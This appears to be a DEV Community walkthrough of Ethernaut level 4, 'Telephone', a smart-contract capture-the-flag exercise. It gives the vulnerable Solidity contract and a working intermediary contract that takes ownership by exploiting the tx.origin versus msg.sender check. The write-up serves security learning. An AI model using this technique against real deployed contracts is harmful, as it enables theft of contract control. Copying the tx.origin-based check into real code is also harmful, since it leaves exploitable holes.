Ethernaut Hacks Level 4: Telephone

#solidity #ethereum #openzeppelin #smartcontract

This is the level 4 of Ethernaut game.

Pre-requisites

Difference between tx.origin and msg.sender

Hack

Given contract:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Telephone {

  address public owner;

  constructor() public {
    owner = msg.sender;
  }

  function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
      owner = _owner;
    }
  }
}

player has to claim this contract's ownership.

Simple one. We'll make an intermediate contract (named IntermediateContract) with the same method changeOwner (or anything else -- name doesn't matter) on Remix. IntermediateContract's changeOwner will simply call Telephone contract's changeOwner.

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

interface ITelephone {
  function changeOwner(address _owner) external;
}

contract IntermediateContract {
  function changeOwner(address _addr) public {
    ITelephone(_addr).changeOwner(msg.sender);
  }
}

player will call IntermediateContract contract's changeOwner, which in turn will call Telephone's changeOwner with msg.sender (which is player) as param. In that case tx.origin is player and msg.sender is IntermediateContract's address. And since now tx.origin != msg.sender, player has claimed the ownership.

Done.

Learned something awesome? Consider starring the github repo 😄

and following me on twitter here 🙏

DEV Community

Ethernaut Hacks Level 4: Telephone

Pre-requisites

Hack

Top comments (0)

Read next

How to Secure a Windows VPS for Remote Desktop Access: A Comprehensive Guide

Empowering Rookie Nigerian Developers: Trends, Tools, and Best Practices for 2024

Printer Scanners VS Mobile Scanner - Do Printers Still Have a Role?

How does link-building impact SEO, and what are the best strategies for acquiring high-quality backlinks?